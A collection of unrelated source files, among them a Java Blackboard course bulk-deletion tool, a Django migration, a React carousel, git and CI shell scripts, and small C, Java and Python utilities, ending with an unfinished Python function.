* NEXT:
* * Use standard sardine methods in LearnServer
* * Require valid certificate for now
* ** Look at https://code.launchpad.net/syncany for SSL possibly
*
*/
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Map;
import java.util.Map.Entry;
import java.util.Scanner;
import org.apache.commons.cli.CommandLine;
import org.apache.commons.cli.CommandLineParser;
import org.apache.commons.cli.OptionBuilder;
import org.apache.commons.cli.Options;
import org.apache.commons.cli.ParseException;
import org.apache.commons.cli.PosixParser;
import org.apache.log4j.*;
/**
 * Command-line tool that bulk-deletes Blackboard Learn courses over WebDAV.
 * Reads course IDs (one per line) from the file given by --deletion-list and
 * deletes each course that exists on the server at --url, authenticating
 * with --user/--password. Pass --no-verify-ssl to skip certificate checks.
 */
public class WebdavBulkDeleterClient {

    static Logger logger = Logger.getLogger(WebdavBulkDeleterClient.class);

    // Stuff all the options into the options object for later use
    // About the static access warning - http://stackoverflow.com/a/1933573/1300307
    // Seems specific to commons cli. Suppressing.
    @SuppressWarnings("static-access")
    private static Options addAllOptions(Options options, Map<String, String> optionsAvailable) {
        Iterator<Entry<String, String>> it = optionsAvailable.entrySet().iterator();
        while (it.hasNext()) {
            Map.Entry<String, String> pairs = it.next();
            String name = pairs.getKey();
            String description = pairs.getValue();
            options.addOption( OptionBuilder.withLongOpt(name)
                                            .withDescription(description)
                                            .hasArg()
                                            .withArgName(name)
                                            .create() );
        }
        return(options);
    }

    // Make sure all the mandatory command line options are present
    private static void verifyOptions(CommandLine line, Map<String, String> options) throws ParseException {
        Iterator<Entry<String, String>> it = options.entrySet().iterator();
        boolean error = false; // Let's be optimistic
        while (it.hasNext()) {
            Map.Entry<String, String> pairs = it.next();
            if (!line.hasOption(pairs.getKey())) {
                logger.error("Please specify option --" + pairs.getKey());
                error = true;
            }
        }
        if (error) {
            throw new ParseException("Required arguments missing");
        }
    }

    @SuppressWarnings("static-access")
    public static void main(String[] args) {
        // Configure log4j from a property file when given, else log to console.
        if (System.getProperty("log4j.configuration") != null) {
            PropertyConfigurator.configure(System.getProperty("log4j.configuration"));
        } else {
            ConsoleAppender console = new ConsoleAppender();
            String PATTERN = "%d [%p|%c|%C{1}] %m%n";
            console.setLayout(new PatternLayout(PATTERN));
            console.setThreshold(Level.DEBUG);
            console.activateOptions();
            logger.setAdditivity(false);
            logger.addAppender(console);
            //Logger.getRootLogger().addAppender(console);
        }
        // Perform command line parsing in an as friendly was as possible.
        // Could be improved
        CommandLineParser parser = new PosixParser();
        Options options = new Options();
        // Use a map to store our options and loop over it to check and parse options via
        // addAllOptions() and verifyOptions() below
        Map<String, String> optionsAvailable = new HashMap<String, String>();
        optionsAvailable.put("deletion-list", "The file containing the list of courses to delete");
        optionsAvailable.put("user", "User with deletion privileges, usually bbsupport");
        optionsAvailable.put("password", "<PASSWORD>");
        optionsAvailable.put("url", "The Learn URL - usually https://example.com/bbcswebdav/courses");
        options = addAllOptions (options, optionsAvailable);
        // BUGFIX: --no-verify-ssl is consulted below but was never registered,
        // so supplying it made the parser reject the whole command line.
        // Register it here (not in optionsAvailable, whose entries
        // verifyOptions() treats as mandatory) as an optional no-arg flag.
        options.addOption(OptionBuilder.withLongOpt("no-verify-ssl")
                                       .withDescription("Skip SSL certificate verification")
                                       .create());
        CommandLine line = null;
        try {
            line = parser.parse(options, args);
            verifyOptions(line, optionsAvailable);
        } catch (ParseException e) {
            // Detailed reason will be printed by verifyOptions above
            logger.fatal("Incorrect options specified, exiting...");
            System.exit(1);
        }
        Scanner scanner = null;
        try {
            scanner = new Scanner( new File(line.getOptionValue("deletion-list")));
        } catch (FileNotFoundException e) {
            logger.fatal("Cannot open file : " + e.getLocalizedMessage());
            System.exit(1);
        }
        // By default we verify SSL certs
        boolean verifyCertStatus = true;
        if (line.hasOption("no-verify-ssl")) {
            verifyCertStatus = false;
        }
        // Loop through deletion list and delete courses if they exist.
        LearnServer instance;
        try {
            logger.debug("Attempting to open connection");
            instance = new LearnServer(line.getOptionValue("user"), line.getOptionValue("password"), line.getOptionValue("url"), verifyCertStatus);
            String currentCourse = null;
            logger.debug("Connection open");
            while(scanner.hasNextLine()) {
                currentCourse = scanner.nextLine();
                if (instance.exists(currentCourse)) {
                    try {
                        instance.deleteCourse(currentCourse);
                        logger.info("Processing " + currentCourse + " : Result - Deletion Successful");
                    } catch (IOException ioe) {
                        logger.error("Processing " + currentCourse + " : Result - Could not Delete (" + ioe.getLocalizedMessage() + ")");
                    }
                } else {
                    logger.info("Processing " + currentCourse + " : Result - Course does not exist");
                }
            }
        } catch (IllegalArgumentException e) {
            logger.fatal(e.getLocalizedMessage());
            if (logger.getLevel() == Level.DEBUG) {
                e.printStackTrace();
            }
            System.exit(1);
        } catch (IOException ioe) {
            logger.debug(ioe);
            logger.fatal(ioe.getMessage());
            if (logger.getLevel() == Level.DEBUG) {
                ioe.printStackTrace();
            }
        } finally {
            // Release the deletion-list file handle on every exit path.
            scanner.close();
        }
    }
}
|
'use strict';
// Metadata-extraction rules for figma.com URLs: both project and document
// pages are classified as Figma documents; the page <title> has the
// trailing " – Figma" suffix stripped.
registerFilter({
  url_regex: [/figma\.com/],
  provider: 'figma',
  provider_name: (_url) => 'Figma',
  type: (_url) => 'DOCUMENT',
  subtype: (_url) => 'FIGMA_DOCUMENT',
  processors: [
    // Project pages: /project/<numeric id>
    {
      source_id_processor: (url) => reMatch(url.pathname, /project\/[0-9]+/, 0),
      // i.e. 'Project Name – Figma' -> 'Project Name'
      title_processor: (t) => `${t.split('–')[0].trim()}`,
    },
    // Document pages: /file/<alphanumeric key>
    {
      source_id_processor: (url) => reMatch(url.pathname, /file\/[a-zA-Z0-9]+/, 0),
      // i.e. 'File Name – Figma' -> 'File Name'
      title_processor: (t) => `${t.split('–')[0].trim()}`,
    },
  ],
});
|
#include <stdio.h>
#include <string.h>
/* Return 1 when str1 and str2 contain exactly the same characters,
 * 0 otherwise. */
int compareStrings(char str1[], char str2[])
{
    int i;

    /* Walk both strings in lock-step until one ends or a mismatch appears. */
    for (i = 0; str1[i] != '\0' && str2[i] != '\0'; i++) {
        if (str1[i] != str2[i])
            return 0;
    }
    /* Identical only if both strings terminated at the same position. */
    return (str1[i] == '\0' && str2[i] == '\0') ? 1 : 0;
}
/* Driver program to test above function.
 * BUGFIX: gets() (removed in C11, cannot bound the read and so allows a
 * buffer overflow) replaced with fgets(), with the trailing newline that
 * fgets keeps stripped via strcspn. */
int main()
{
    char str1[30], str2[30];

    printf("Enter the first string : \n");
    if (fgets(str1, sizeof str1, stdin) == NULL)
        return 1;
    str1[strcspn(str1, "\n")] = '\0';

    printf("Enter the second string : \n");
    if (fgets(str2, sizeof str2, stdin) == NULL)
        return 1;
    str2[strcspn(str2, "\n")] = '\0';

    if (compareStrings(str1, str2) == 1)
        printf("Strings are identical \n");
    else
        printf("Strings are not identical \n");
    return 0;
}
<filename>hexa/plugins/connector_dhis2/migrations/0007_longer_text_fields.py
# Generated by Django 3.2.3 on 2021-06-11 12:17
from django.db import migrations, models
class Migration(migrations.Migration):
    """Widen DHIS2 name fields.

    Free-text name fields (``dhis2_name``/``name``) become unbounded
    TextFields; short-name fields become 200-char CharFields, applied
    uniformly to dataelement, indicator, indicatortype and instance.
    """

    dependencies = [
        ("connector_dhis2", "0006_sync_fine_tuning"),
    ]

    operations = [
        migrations.AlterField(
            model_name="dataelement",
            name="dhis2_name",
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name="dataelement",
            name="dhis2_short_name",
            field=models.CharField(blank=True, max_length=200),
        ),
        migrations.AlterField(
            model_name="dataelement",
            name="name",
            field=models.TextField(blank=True),
        ),
        migrations.AlterField(
            model_name="dataelement",
            name="short_name",
            field=models.CharField(blank=True, max_length=200),
        ),
        migrations.AlterField(
            model_name="indicator",
            name="dhis2_name",
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name="indicator",
            name="dhis2_short_name",
            field=models.CharField(blank=True, max_length=200),
        ),
        migrations.AlterField(
            model_name="indicator",
            name="name",
            field=models.TextField(blank=True),
        ),
        migrations.AlterField(
            model_name="indicator",
            name="short_name",
            field=models.CharField(blank=True, max_length=200),
        ),
        migrations.AlterField(
            model_name="indicatortype",
            name="dhis2_name",
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name="indicatortype",
            name="dhis2_short_name",
            field=models.CharField(blank=True, max_length=200),
        ),
        migrations.AlterField(
            model_name="indicatortype",
            name="name",
            field=models.TextField(blank=True),
        ),
        migrations.AlterField(
            model_name="indicatortype",
            name="short_name",
            field=models.CharField(blank=True, max_length=200),
        ),
        migrations.AlterField(
            model_name="instance",
            name="name",
            field=models.TextField(blank=True),
        ),
        migrations.AlterField(
            model_name="instance",
            name="short_name",
            field=models.CharField(blank=True, max_length=200),
        ),
    ]
|
<reponame>linhhvo/newdle
import React from 'react';
import PropTypes from 'prop-types';
import {Icon} from 'semantic-ui-react';
import styles from './DayCarousel.module.scss';
export default function DayCarousel({
items,
numberOfVisible,
activeIndex,
activePosition,
step,
renderItem,
changeItem,
}) {
const next = () => {
const newIndex = (activeIndex + step) % items.length;
const nextPosition =
activePosition + step < numberOfVisible ? activePosition + step : numberOfVisible - 1;
if (changeItem) {
changeItem(items[newIndex], nextPosition);
}
};
const prev = () => {
const newIndex = Math.max(activeIndex - step, 0);
const nextPosition = activePosition - step >= 0 ? activePosition - step : 0;
if (changeItem) {
changeItem(items[newIndex], nextPosition);
}
};
let showPrevBtn, showNextBtn, fromIndex, toIndex;
if (numberOfVisible >= items.length) {
showPrevBtn = showNextBtn = false;
fromIndex = 0;
toIndex = items.length;
} else {
showPrevBtn = activeIndex !== 0;
showNextBtn = activeIndex < items.length - 1;
fromIndex = activeIndex - activePosition < 0 ? 0 : activeIndex - activePosition;
toIndex = activeIndex + (numberOfVisible - activePosition);
}
return (
<>
{showPrevBtn && (
<Icon size="big" name="angle left" onClick={prev} className={styles['prev-icon']} />
)}
{showNextBtn && (
<Icon size="big" name="angle right" onClick={next} className={styles['next-icon']} />
)}
{items.slice(fromIndex, toIndex).map(renderItem)}
</>
);
}
// Runtime prop contract: only the item list and the renderer are required;
// all navigation-related props get the defaults below.
DayCarousel.propTypes = {
  items: PropTypes.array.isRequired,
  numberOfVisible: PropTypes.number,
  activeIndex: PropTypes.number,
  activePosition: PropTypes.number,
  step: PropTypes.number,
  renderItem: PropTypes.func.isRequired,
  changeItem: PropTypes.func,
};
// Defaults: show 3 items, start at the first item/slot, move one at a time;
// changeItem = null makes the arrows no-ops.
DayCarousel.defaultProps = {
  numberOfVisible: 3,
  activeIndex: 0,
  activePosition: 0,
  step: 1,
  changeItem: null,
};
|
#!/bin/sh
#
# Change the author name and/or email of a single commit.
#
# change-author [-f] commit-to-change [branch-to-rewrite [new-name [new-email]]]
#
# If -f is supplied it is passed to "git filter-branch".
#
# If <branch-to-rewrite> is not provided or is empty HEAD will be used.
# Use "--all" or a space separated list (e.g. "master next") to rewrite
# multiple branches.
#
# If <new-name> (or <new-email>) is not provided or is empty, the normal
# user.name (user.email) Git configuration value will be used.
#
# -f is the only flag handled here; it is forwarded to "git filter-branch"
# (where it allows overwriting an existing refs/original backup).
force=''
if test "x$1" = "x-f"; then
	force='-f'
	shift
fi

# Print the given message(s) and abort with exit code 128 (git's fatal code).
die() {
	printf '%s\n' "$@"
	exit 128
}

targ="$(git rev-parse --verify "$1" 2>/dev/null)" || die "$1 is not a commit"
br="${2:-HEAD}"

# Exported so the env-filter below (evaluated once per rewritten commit) can
# see which commit to change and the replacement identity.
TARG_COMMIT="$targ"
TARG_NAME="${3-}"
TARG_EMAIL="${4-}"
export TARG_COMMIT TARG_NAME TARG_EMAIL

# Only the matching commit is touched. An empty name/email unsets the
# override variable, so git falls back to user.name / user.email config.
filt='

if test "$GIT_COMMIT" = "$TARG_COMMIT"; then
	if test -n "$TARG_EMAIL"; then
		GIT_AUTHOR_EMAIL="$TARG_EMAIL"
		export GIT_AUTHOR_EMAIL
	else
		unset GIT_AUTHOR_EMAIL
	fi
	if test -n "$TARG_NAME"; then
		GIT_AUTHOR_NAME="$TARG_NAME"
		export GIT_AUTHOR_NAME
	else
		unset GIT_AUTHOR_NAME
	fi
fi
'

# $force and $br are intentionally unquoted: $force may be empty and $br may
# expand to several branch names (or "--all").
git filter-branch $force --env-filter "$filt" -- $br
#!/bin/bash
# Script to execute tests on OPERA DSWx-HLS PGE Docker image
#
set -e

# Parse args
while [[ $# -gt 0 ]]; do
  case $1 in
    -h|--help)
      echo "Usage: test_dswx_hls.sh [-h|--help] [-t|--tag <tag>] [-w|--workspace <path>]"
      exit 0
      ;;
    -t|--tag)
      TAG=$2
      shift
      shift
      ;;
    -w|--workspace)
      WORKSPACE=$2
      shift
      shift
      ;;
    -*|--*)
      # NOTE(review): unknown flags are assumed to carry a value and shift
      # twice, which can swallow a following valid option — confirm intended.
      echo "Unknown arguments $1 $2, ignoring..."
      shift
      shift
      ;;
    *)
      echo "Unknown argument $1, ignoring..."
      shift
      ;;
  esac
done

echo '
=====================================
Testing DSWx-HLS PGE Docker image...
=====================================
'

PGE_NAME="dswx_hls"
IMAGE="opera_pge/${PGE_NAME}"
TEST_RESULTS_REL_DIR="test_results"

# defaults
# WORKSPACE falls back to the repository root (two levels above this script).
[ -z "${WORKSPACE}" ] && WORKSPACE=$(realpath $(dirname $(realpath $0))/../..)
[ -z "${TAG}" ] && TAG="${USER}-dev"

TEST_RESULTS_DIR="${WORKSPACE}/${TEST_RESULTS_REL_DIR}/${PGE_NAME}"

echo "Test results output directory: ${TEST_RESULTS_DIR}"
# Group-writable so the CI system can clean results up after archiving.
mkdir --mode=775 --parents ${TEST_RESULTS_DIR}
chmod -R 775 ${TEST_RESULTS_DIR}
# Use the environment of the docker image to run linting, tests, etc...
# Note the change of working directory (-w) to a directory without
# Python code so that import statements favor Python code found in the
# Docker image rather than code found on the host.
# BUG FIX: the "-w" line was missing its trailing backslash, so the quoted
# value contained a raw embedded newline; every interior line must end with
# a line continuation so the command collapses to a single line.
DOCKER_RUN="docker run --rm \
  -v ${WORKSPACE}:/workspace \
  -w /workspace/${TEST_RESULTS_REL_DIR} \
  -u ${UID}:$(id -g) \
  --entrypoint /opt/conda/bin/pge_tests_entrypoint.sh \
  ${IMAGE}:${TAG}"
# Configure a trap to set permissions on exit regardless of whether the testing succeeds
function set_perms {
  # Open up permissions on all test results we can be sure the CI system can
  # delete them after they're archived within Jenkins
  # (directories need the execute bit, hence the separate 775/664 passes)
  ${DOCKER_RUN} bash -c "find \
      /workspace/${TEST_RESULTS_REL_DIR} -type d -exec chmod 775 {} +"
  ${DOCKER_RUN} bash -c "find \
      /workspace/${TEST_RESULTS_REL_DIR} -type f -exec chmod 664 {} +"
}
trap set_perms EXIT
# linting and pep8 style check (configured by .flake8 and .pylintrc)
# --exit-zero on both linters: findings are archived via the log files
# instead of failing the build.
${DOCKER_RUN} flake8 \
    --config /home/conda/opera/.flake8 \
    --jobs auto \
    --exit-zero \
    --application-import-names opera \
    --output-file /workspace/${TEST_RESULTS_REL_DIR}/${PGE_NAME}/flake8.log \
    /home/conda/opera

${DOCKER_RUN} pylint \
    --rcfile=/home/conda/opera/.pylintrc \
    --jobs 0 \
    --exit-zero \
    --output=/workspace/${TEST_RESULTS_REL_DIR}/${PGE_NAME}/pylint.log \
    --enable-all-extensions \
    /home/conda/opera

# pytest (including code coverage)
# Wrapped in bash -c so the output redirection happens inside the container.
${DOCKER_RUN} bash -c "pytest \
    --junit-xml=/workspace/${TEST_RESULTS_REL_DIR}/${PGE_NAME}/pytest-junit.xml \
    --cov=/home/conda/opera/pge \
    --cov=/home/conda/opera/scripts \
    --cov=/home/conda/opera/util \
    --cov-report=term \
    --cov-report=html:/workspace/${TEST_RESULTS_REL_DIR}/${PGE_NAME}/coverage_html \
    /workspace/src/opera/test > /workspace/${TEST_RESULTS_REL_DIR}/${PGE_NAME}/pytest.log 2>&1"

echo "DSWx-HLS PGE Docker image test complete"

exit 0
|
/*
* Copyright [2018] [<NAME>]
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.jacpfx.vxms.rest.base.response;
import io.vertx.core.buffer.Buffer;
import io.vertx.ext.web.Cookie;
import io.vertx.ext.web.FileUpload;
import io.vertx.ext.web.RoutingContext;
import java.util.Set;
/**
* Created by <NAME> on 12.01.16. This class allows easy access to Request values like
* Cookies, parameters and attributes.
*/
public class RESTRequest {

  // Per-request Vert.x routing context; every accessor below is a thin,
  // stateless delegation to it.
  private final RoutingContext context;

  /** @param context the Vert.x routing context */
  public RESTRequest(RoutingContext context) {
    this.context = context;
  }

  /**
   * Returns the parameter value for the given parameter name
   *
   * @param paramName the http parameter name
   * @return the parameter value
   */
  public String param(String paramName) {
    return context.request().getParam(paramName);
  }

  /**
   * Returns the header value for requested name
   *
   * @param headerName the header name
   * @return the requested header value
   */
  public String header(String headerName) {
    return context.request().getHeader(headerName);
  }

  /**
   * Returns the form attribute for requested name
   *
   * @param attributeName the name of the attribute
   * @return the attribute requested
   */
  public String formAttribute(String attributeName) {
    return context.request().getFormAttribute(attributeName);
  }

  /**
   * Returns a set with uploaded files
   *
   * @return the set of files
   */
  public Set<FileUpload> fileUploads() {
    return context.fileUploads();
  }

  /**
   * Returns a set of cookies
   *
   * @return the set of cookies
   */
  public Set<Cookie> cookies() {
    return context.cookies();
  }

  /**
   * Returns a cookie by name
   *
   * @param name the cookie name
   * @return the cookie
   */
  public Cookie cookie(String name) {
    return context.getCookie(name);
  }

  /**
   * Returns the request body
   *
   * @return the request body
   */
  public Buffer body() {
    return context.getBody();
  }
}
|
#!/bin/bash
# This script parses in the command line parameters from runCust,
# maps them to the correct command line parameters for DispNet training script and launches that task
# The last line of runCust should be: bash $CONFIG_FILE --data-dir $DATA_DIR --log-dir $LOG_DIR
# Parse the command line parameters
# that runCust will give out
# Defaults: NONE is a sentinel meaning "not supplied on the command line".
DATA_DIR=NONE
LOG_DIR=NONE
CONFIG_DIR=NONE
MODEL_DIR=NONE

# Parsing command line arguments:
# Each option-with-value branch shifts once for the value; the trailing
# shift after esac consumes the option itself.
# (FIX: use the arithmetic -gt, not the lexical [[ ... > ... ]] comparison.)
while [[ $# -gt 0 ]]
do
key="$1"
case $key in
    -h|--help)
    echo "Usage: run_dispnet_training_philly.sh [run_options]"
    echo "Options:"
    echo "  -d|--data-dir <path> - directory path to input data (default NONE)"
    echo "  -l|--log-dir <path> - directory path to save the log files (default NONE)"
    echo "  -p|--config-file-dir <path> - directory path to config file directory (default NONE)"
    echo "  -m|--model-dir <path> - directory path to output model file (default NONE)"
    exit 1
    ;;
    -d|--data-dir)
    DATA_DIR="$2"
    shift # pass argument
    ;;
    -p|--config-file-dir)
    CONFIG_DIR="$2"
    shift # pass argument
    ;;
    -m|--model-dir)
    MODEL_DIR="$2"
    shift # pass argument
    ;;
    -l|--log-dir)
    LOG_DIR="$2"
    # BUG FIX: this shift was missing, so the log-dir value was re-parsed
    # on the next iteration and reported as an unknown option.
    shift # pass argument
    ;;
    *)
    echo Unknown option $key
    ;;
esac
shift # past argument or value
done
# Prints out the arguments that were passed into the script
echo "DATA_DIR=$DATA_DIR"
echo "LOG_DIR=$LOG_DIR"
echo "CONFIG_DIR=$CONFIG_DIR"
echo "MODEL_DIR=$MODEL_DIR"

# Run training on philly
# Add the root folder of the code to the PYTHONPATH
export PYTHONPATH=$PYTHONPATH:$CONFIG_DIR

# Run the actual job
# NOTE(review): despite the DispNet wording in the header, this launches the
# cifar-ann-v2 ResNet example — confirm this is the intended entry point.
python $CONFIG_DIR/examples/ResNet/cifar-ann-v2.py \
    --data_dir=$DATA_DIR \
    --log_dir=$LOG_DIR \
    --model_dir=$MODEL_DIR \
    --num_classes=100 \
    -f=5 \
    --opt_at=-1 \
    -n=13 \
    -c=16 \
    --samloss=2 \
    --batch_size=128 \
    --exp_gamma=0.3 --sum_rand_ratio=2 --last_reward_rate=0.8
|
#!/usr/bin/env bash
# Endless terminal animation: cycle through the four octopus frames forever
# at ~3 frames/second. Stop with Ctrl-C.
while true; do
  for frame in 1 2 3 4; do
    clear
    cat "octelpus/octelpus${frame}"
    sleep 0.3
  done
done
|
package com.telenav.osv.network.model.tagging;
import com.google.gson.annotations.Expose;
import com.google.gson.annotations.SerializedName;
/**
 * Gson-mapped response model for a single tagging data entry, including file
 * metadata, processing state and the owning sequence.
 */
public class ResponseModelTaggingData {

    @SerializedName("id")
    @Expose
    public String id;

    @SerializedName("dataType")
    @Expose
    public String dataType;

    @SerializedName("dateAdded")
    @Expose
    public String dateAdded;

    @SerializedName("filemd5")
    @Expose
    public String filemd5;

    @SerializedName("filename")
    @Expose
    public String filename;

    @SerializedName("filepath")
    @Expose
    public String filepath;

    @SerializedName("filesize")
    @Expose
    public String filesize;

    @SerializedName("processingError")
    @Expose
    public String processingError;

    // Loosely typed on purpose: serialized as the JSON "processingResult" field.
    @SerializedName("processingResult")
    @Expose
    public Object processingResult;

    @SerializedName("processingStatus")
    @Expose
    public String processingStatus;

    @SerializedName("sequence")
    @Expose
    public ResponseModelTaggingSequence responseModelTaggingSequence;

    @SerializedName("sequenceIndex")
    @Expose
    public String sequenceIndex;

    @SerializedName("status")
    @Expose
    public String status;

    @SerializedName("storage")
    @Expose
    public String storage;

    /**
     * No args constructor for use in serialization
     */
    public ResponseModelTaggingData() {
    }

    /**
     * All-args constructor (parameters listed in declaration order).
     *
     * @param id
     * @param dataType
     * @param dateAdded
     * @param filemd5
     * @param filename
     * @param filepath
     * @param filesize
     * @param processingError
     * @param processingResult
     * @param processingStatus
     * @param responseModelTaggingSequence
     * @param sequenceIndex
     * @param status
     * @param storage
     */
    public ResponseModelTaggingData(String id, String dataType, String dateAdded, String filemd5, String filename, String filepath, String filesize, String processingError,
                                    Object processingResult, String processingStatus, ResponseModelTaggingSequence responseModelTaggingSequence, String sequenceIndex,
                                    String status, String storage) {
        super();
        this.id = id;
        this.dataType = dataType;
        this.dateAdded = dateAdded;
        this.filemd5 = filemd5;
        this.filename = filename;
        this.filepath = filepath;
        this.filesize = filesize;
        this.processingError = processingError;
        this.processingResult = processingResult;
        this.processingStatus = processingStatus;
        this.responseModelTaggingSequence = responseModelTaggingSequence;
        this.sequenceIndex = sequenceIndex;
        this.status = status;
        this.storage = storage;
    }
}
|
/*
* Copyright 2014-2018 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
* either express or implied. See the License for the specific language
* governing permissions and limitations under the License.
*/
package org.dbflute.logic.replaceschema.schemainitializer;
import java.sql.Connection;
import java.util.List;
import org.dbflute.logic.jdbc.metadata.info.DfForeignKeyMeta;
import org.dbflute.logic.jdbc.metadata.info.DfTableMeta;
/**
* @author jflute
*/
public class DfSchemaInitializerMySQL extends DfSchemaInitializerJdbc {
// ===================================================================================
// Drop Foreign Key
// ================
@Override
protected void dropForeignKey(Connection connection, List<DfTableMeta> tableMetaInfoList) {
final DfDropForeignKeyByJdbcCallback callback = new DfDropForeignKeyByJdbcCallback() {
public String buildDropForeignKeySql(DfForeignKeyMeta metaInfo) {
final String foreignKeyName = metaInfo.getForeignKeyName();
final String localTableName = metaInfo.getLocalTableSqlName();
final StringBuilder sb = new StringBuilder();
sb.append("alter table ").append(localTableName).append(" drop foreign key ").append(foreignKeyName);
return sb.toString();
}
};
callbackDropForeignKeyByJdbc(connection, tableMetaInfoList, callback);
}
} |
#!/usr/bin/env bash
# Tear down the localstack test environment: kill any leftover lambda
# containers, then bring the docker-compose stack down.
stopLocalstack() {
  # ROBUSTNESS FIX: bail out if the compose directory is missing instead of
  # running the docker/compose commands from the wrong working directory.
  pushd tests/mock-aws || return 1
  # clear down lambda containers still hanging around
  printf "Removing lambda containers: "
  containers=$(docker ps -a -q --filter ancestor="lambci/lambda:nodejs8.10" --format="{{.ID}}")
  if [ -n "${containers}" ]; then
    docker kill ${containers}
  fi
  pipenv run docker-compose down
  popd
}
stopLocalstack
|
#! /bin/bash -e
set -o pipefail
set -o errexit
set -o nounset

# Guard: this script only makes sense inside the CI artifacts image, where
# the toolbox/ entitlement helpers are laid out relative to $PWD.
if ! [ -f toolbox/entitlement/test.sh ]; then
    echo "FATAL: entitlement scripts not found in $PWD/toolbox/entitlement/"
    echo "INFO: $0 is intended only for running in the 'OpenShift PSAP CI artifacts' image. (INSIDE_CI_IMAGE=$INSIDE_CI_IMAGE)"
    exit 1
fi
# extract_entitlement_key <machineconfig-yaml> <output-pem-path>
# Pulls the base64-encoded entitlement PEM out of the "50-entitlement-pem"
# MachineConfig entry of the resource file and decodes it to the given path.
extract_entitlement_key() {
    resource=$1
    key=$2
    RESOURCE_NAME=50-entitlement-pem
    # yq converts the YAML to JSON; jq selects the named resource and digs out
    # the first storage file's data-URI content, which is then base64-decoded.
    cat "$resource" \
        | yq . \
        | jq -r -c 'select(.metadata.name=="'${RESOURCE_NAME}'")|.spec.config.storage.files[0].contents.source' \
        | sed 's|data:text/plain;charset=utf-8;base64,||g' \
        | base64 -d \
        > "$key"
}
echo "Testing if the cluster is already entitled ..."
if toolbox/entitlement/test.sh --no-inspect; then
    echo "Cluster already entitled, skipping entitlement."
    exit 0
fi

entitlement_deployed=0

# First choice: deploy directly from a PEM key file.
ENTITLEMENT_PEM=${ENTITLEMENT_PEM:-/var/run/psap-entitlement-secret/entitlement.pem}
if [ -z "$ENTITLEMENT_PEM" ]; then
    echo "INFO: no entitlement key provided (ENTITLEMENT_PEM)"
elif [ ! -e "$ENTITLEMENT_PEM" ]; then
    echo "INFO: entitlement key doesn't exist (ENTITLEMENT_PEM=$ENTITLEMENT_PEM)"
else
    echo "Deploying the entitlement with PEM key from ${ENTITLEMENT_PEM}"
    toolbox/entitlement/deploy.sh --pem ${ENTITLEMENT_PEM}
    entitlement_deployed=1
fi

# Fallback: extract the PEM from a cluster-wide MachineConfig resource file.
ENTITLEMENT_RESOURCES=${ENTITLEMENT_RESOURCES:-/var/run/psap-entitlement-secret/01-cluster-wide-machineconfigs.yaml}
if [ "$entitlement_deployed" == 1 ]; then
    # entitlement already deployed
    true
elif [ -z "$ENTITLEMENT_RESOURCES" ]; then
    echo "INFO: no entitlement resource provided (ENTITLEMENT_RESOURCES)"
elif [ ! -e "$ENTITLEMENT_RESOURCES" ]; then
    echo "INFO: entitlement resource file doesn't exist (ENTITLEMENT_RESOURCES=$ENTITLEMENT_RESOURCES)"
else
    ENTITLEMENT_KEY=/tmp/key.pem
    extract_entitlement_key $ENTITLEMENT_RESOURCES $ENTITLEMENT_KEY
    toolbox/entitlement/deploy.sh --pem "${ENTITLEMENT_KEY}"
    entitlement_deployed=1
fi
# Nothing could be deployed: fail loudly so the CI run stops here.
# (FIX: error message previously read "and not entitlement provided".)
if [ "$entitlement_deployed" == 0 ]; then
    echo "FATAL: cluster isn't entitled and no entitlement was provided (ENTITLEMENT_PEM)"
    exit 1
fi

# Block until the entitlement is effective on the nodes; a half-applied
# entitlement would make every subsequent step fail obscurely.
if ! toolbox/entitlement/wait.sh; then
    echo "FATAL: Failed to properly entitle the cluster, cannot continue."
    exit 1
fi
import pandas as pd

# Read in the data
df = pd.read_csv('data.csv')

# Preprocess the data
# NOTE(review): preprocessData is neither defined nor imported in this file —
# confirm it is provided by the surrounding execution environment.
df = preprocessData(df)

# Split the data into training and test
# NOTE(review): train_test_split is not imported here (it normally comes from
# sklearn.model_selection) — confirm the import exists elsewhere.
# 80/20 split: column 'X' is the target, everything else the features.
train_X, test_X, train_y, test_y = train_test_split(df.drop('X',axis=1),
                                                    df['X'], test_size=0.2)

# Save the training and test data to files
train_X.to_csv('train_X.csv', index=False)
test_X.to_csv('test_X.csv', index=False)
train_y.to_csv('train_y.csv', index=False)
test_y.to_csv('test_y.csv', index=False)
# Taskwarrior zsh completion tweaks: verbose match descriptions, with group
# headings rendered underlined + bold, and no per-group separation.
zstyle ':completion:*:*:task:*' verbose yes
zstyle ':completion:*:*:task:*:descriptions' format '%U%B%d%b%u'
zstyle ':completion:*:*:task:*' group-name ''

# 't' as a shorthand for task, sharing task's completion function.
alias t=task
compdef _task t=task
|
#!/usr/bin/env bash
#ppp="~/.xxx/xxxfile"
ppp="/root/.yyy/xxxfile"
sudo rm -rf $ppp
echo "Create $ppp..."
#if [ ! -d `dirname $ppp` ]; then
#  mkdir -p `dirname $ppp`
#fi
# BUG FIX: "sudo cat <<EOF >$ppp" performed the redirection as the *invoking*
# user (the shell opens the file before sudo runs), so writing under /root
# failed unless the whole script already ran as root. "sudo tee" does the
# write with elevated privileges; >/dev/null drops tee's stdout echo.
sudo tee "$ppp" >/dev/null <<EOF
i
like
it
anyway
EOF
ls -l $ppp
|
public static String longestCommonPrefix(String[] strs) {
if (strs.length == 0)
return "";
String prefix = strs[0];
for (int i = 1; i < strs.length; i++)
while (strs[i].indexOf(prefix) != 0) {
prefix = prefix.substring(0, prefix.length() - 1);
if (prefix.isEmpty())
return "";
}
return prefix;
} |
<filename>Code Challenges/python/equal_numbers_eda.py
# (user) problem
# we know two numbers, but we need to know if they are equal
# return true or false
# solution (product)
# use boolean check, return result
def is_same_num(num1, num2):
